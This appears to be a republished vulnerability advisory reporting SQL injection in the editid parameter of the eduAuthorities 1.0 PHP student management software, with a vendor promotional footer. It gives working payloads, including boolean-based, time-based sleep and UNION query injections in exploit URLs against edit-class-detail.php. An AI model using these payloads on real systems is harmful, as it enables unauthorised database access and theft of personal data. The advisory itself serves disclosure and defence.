The eduAuthorities 1.0 software from mayurik.com is vulnerable to SQL injection attacks, allowing attackers to gain unauthorized access to the system and potentially extract sensitive information. The vulnerability was confirmed through different responses to specific payloads and a significant increase in response time. An example exploit URL is provided for further reference
`## Titles: eduAuthorities-1.0 Multiple-SQLi
## Author: nu11secur1ty
## Date: 07/29/2024
## Vendor: https://www.mayurik.com/
## Software:
https://www.sourcecodester.com/php/16137/online-student-management-system-php-free-download.html
## Reference: https://portswigger.net/web-security/sql-injection
## Description:
The editid parameter appears to be vulnerable to SQL injection attacks. The
payloads 15750083 or 4189=04189 and 58006253 or 7709=7710 were each
submitted in the editid parameter. These two requests resulted in different
responses, indicating that the input is being incorporated into a SQL query
in an unsafe way. Note that automated difference-based tests for SQL
injection flaws can often be unreliable and are prone to false positive
results. You should manually review the reported requests and responses to
confirm whether a vulnerability is actually present.
Additionally, the payload (select*from(select(sleep(20)))a) was submitted
in the editid parameter. The application took 20011 milliseconds to respond
to the request, compared with 3 milliseconds for the original request,
indicating that the injected SQL command caused a time delay.The attacker
can get all information from the system by using this vulnerability!
STATUS: HIGH- Vulnerability
[+]Exploits:
- SQLi Multiple:
```mysql
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP
BY clause (EXTRACTVALUE)
Payload: http://pwnedhost.com/eduauth/edit-class-detail.php?editid=-8488
OR EXTRACTVALUE(2229,CASE WHEN (2229=2229) THEN 2229 ELSE 0x3A END)#
UiVZfrom(select(sleep(3)))a)
Type: UNION query
Title: MySQL UNION query (random number) - 3 columns
Payload: http://pwnedhost.com/eduauth/edit-class-detail.php?editid=-2962
UNION ALL SELECT
8651,8651,CONCAT(0x7176627a71,0x664c6c4a72786a466c676743684468646d676e646d476f535a4f4a64694375516a54746d52426253,0x7171766b71),8651#from(select(sleep(3)))a)
---
```
## Reproduce:
[href](https://www.patreon.com/posts/eduauthorities-1-109562178)
## More:
[href](
https://www.nu11secur1ty.com/2024/08/eduauthorities-10-multiple-sqli.html)
## Time spent:
00:37:00
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo